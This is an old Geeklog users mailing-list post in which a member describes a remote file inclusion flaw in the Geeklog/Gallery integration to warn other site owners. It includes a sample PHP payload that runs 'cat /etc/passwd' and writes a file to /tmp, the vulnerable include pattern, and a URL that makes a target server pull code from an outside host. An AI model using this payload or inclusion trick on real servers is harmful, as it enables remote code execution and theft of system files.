[geeklog-users] Geeklog/Gallery vulnerability

[Jason Signalness]

Dirk Haun wrote:


>Jason,

>

>  

>

>>This article worries me a bit:

>>http://www.securityfocus.com/guest/24043

>>    

>>

>[...]

>  

>

>>The vulerability discussed allowed me to write arbitrary data to the 

>>server's hard disk, run all kinds of shell commands, and get the output 

>>back in my browser.  Worrying to be sure.

>>    

>>

>

>Hmm, I've only skimmed the article yet but my first impression was that

>it a) was "only" a problem of the Geeklog/Gallery integration (not of

>Geeklog itself) and b) was "only" used to send spam.

>

>I must have missed the bit about writing to the server's hard disk, but I

>don't really have the time now to look into it. Can someone confirm if

>this is "only" a problem with the Gallery integration?

>

>bye, Dirk

>

>

>  

>

Hello again,

The article didn't mention writing to the server's hard disk.  I was 
able to do that myself after reading the article.  It's not hard, once 
you get the basic idea.

Essentially, this allows you to feed PHP script to a remote server, 
which will then execute it.  So, if your server is running Gallery & 
Geeklog, I can make your server execute this:

<?
passthru('cat /etc/passwd');
passthru('echo "MY DATA HERE" > /tmp/mydataonyourdisk.file');
. . .
?>

As far as I know, this is possible anywhere someone does something like 
this:
include('$VARIABLE/file.php');

A user in the know could construct a URL like 
http://yoursite.com/blah.php?VARIBLE=http://mysite.com/mycode.php.

I'm not an expert by any means, so if this doesn't make sense or is 
wrong, let me know.

-Jason